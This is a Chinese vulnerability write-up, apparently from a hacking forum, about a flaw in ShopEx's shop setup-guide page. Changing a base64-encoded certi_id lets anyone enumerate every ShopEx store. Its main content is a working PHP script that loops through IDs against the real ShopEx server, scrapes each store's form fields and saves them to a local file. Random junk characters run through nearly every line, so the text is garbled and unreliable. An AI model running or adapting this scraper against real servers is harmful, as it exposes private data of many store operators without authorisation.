|
简要描述:- q- y% Y( t' H+ _/ ^5 u
ShopEx某接口缺陷,可遍历所有网站
6 W4 ^3 J& T6 f0 n d. I& d4 w. a详细说明:
6 \) L! ~( Z1 n问题出现在shopex 网店使用向导页面
; }2 |& @7 k4 j/ o9 ]" P) @& E" ~4 f6 }3 q' V
4 i, y, L6 n7 ^; B8 S
/ v/ |6 q Z! k' l# k
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=6 v/ y+ Z. s8 J$ S: D4 _
7 R4 f9 B% a! l2 s5 P, w. O0 | b8 H% o/ x' n$ Y/ }
" g" w. i1 U9 R9 ?; |# X5 E# u
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
8 _3 o0 K; s7 u7 g- p
, m" X( \8 j( x( c9 W
9 h1 f, g5 q# v0 f3 J: H
/ q6 H0 V7 v. r% G/ r5 w我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 , q" D! |) } B0 |
& e* A+ x, h6 o9 y) z2 M( h
9 L1 d$ x9 g1 E( K' p# q: U1 o
9 ~/ b# i7 a. Z/ k- h3 V2 T. [* n<?php. }$ H! m9 }* y+ `2 P. ~2 p- e
5 ~' T. O: K. B8 c for ($i=1; $i < 10000; $i++) { //遍历
& u2 q$ D( p( [4 k S7 F j. }$ }6 F3 _
ShowshopExD($i);
% _! O" i5 U- J
& P, c" ^* F, V6 Y8 U; o/ n0 B" G }9 L2 B X# I% [) {
* t0 B) T, \6 k7 u6 n5 s
function ShowshopExD($cid) {
. \2 o+ ~3 v/ i2 k
% L7 | P; i* {* o $url='http://guide.ecos.shopex.cn/step2.php';
8 U" W1 D9 a0 Z( i
4 g" o5 Z; ~- Q9 e" @ $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');0 C H" k+ e: R* Q$ a0 y
4 p, e4 ?; ^* }% f
$url = $url.'?refer='.$refer;5 }0 @3 C, {: {
& e% T, D8 }' A- P' f# a $ch = curl_init($url);8 p8 p5 o$ z/ Q4 e& A( H8 ~, P
) @4 T$ {6 V4 o; C curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
0 p, p! {' S' _/ B' `0 |
, X; {1 `; X3 p# s curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;6 T3 r* e$ d8 o. N+ i1 a* b
4 e- U6 p- G3 m+ J" Y @4 K $result = curl_exec($ch);+ M5 C+ N6 y, Q$ z" s! v& S+ Y$ g
3 _$ X$ \/ W5 l% w! h: N( F, d
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
. b( B/ {9 R5 S4 \& M% m$ X9 G D0 @2 N( G
if(strpos($result,$refer))% }+ D4 s$ w5 ?, K$ T' a
0 y6 w: M% D! J7 V& o- \ {7 F# R9 Z, ~+ c, C8 c2 ~4 X
# ~7 @! ` n! H: z
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
$ |9 k' g! I8 @2 j& s; y/ h2 q2 D6 e0 k. ~* m/ U
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);, f' d8 r$ `& F6 E
( ?2 O) i5 E) G# ^9 ^$ R1 l
foreach ($value[1] as $key) {% V! p! p' F9 M9 h6 e
7 d0 |5 U/ i6 i
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
: Z- p/ M) V& E/ ?! i) i. y- z F8 \& `' \$ q% X z7 q1 ~
echo $res[1][0].':'.$res[3][0]."\r\n";9 R1 V9 n6 ~' ?& N; J1 U6 f" V8 v
( ^" g) M6 @" A& }+ H# C4 \
$col =$res[1][0].':'.$res[3][0]."\r\n"; 6 m+ C, ^6 y4 e8 K( C0 h* s9 {
! o4 q+ T2 y1 y* Y2 i3 Y# e
fwrite($fp, $col, strlen($col)); % i1 M# h& q4 g
8 W# w; D0 p- y8 ?& Y" F3 j
}
, q7 b. g6 P: q# |6 U$ u7 ]" Y7 o4 x3 C" E. c8 k! j! H) N! E6 E r
echo '--------------------------------'."\r\n";" _1 U" U4 ^. b/ |5 k
- M M4 T3 D A9 A fclose($fp); 7 D7 C5 ]7 E: c) N$ S7 W
0 _2 v# p2 Q/ }4 e' `) C3 e
}
4 j7 b h1 _) ~
4 U+ Y1 o" E$ d% g" R: [: K flush();
1 V# E! ^) D6 |. s( K5 o6 G% O2 ]. z: Z$ m- z/ N8 ^2 m: z
curl_close($ch);
& E) t0 O8 G% U+ J2 \, |' ^2 `) v2 [( t6 d9 W% R) b' x
}4 l% b) W) M! e5 N& D8 Y
, h t1 W, n- m. u
?>
2 P' ]( b) U) e漏洞证明:
5 @) G, x0 Z1 p" B! y! F) Vhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
4 x- I- H) B% Zrefer换成其他加密方式; u( _2 d( k' p/ n4 P+ ?5 `( M
|
|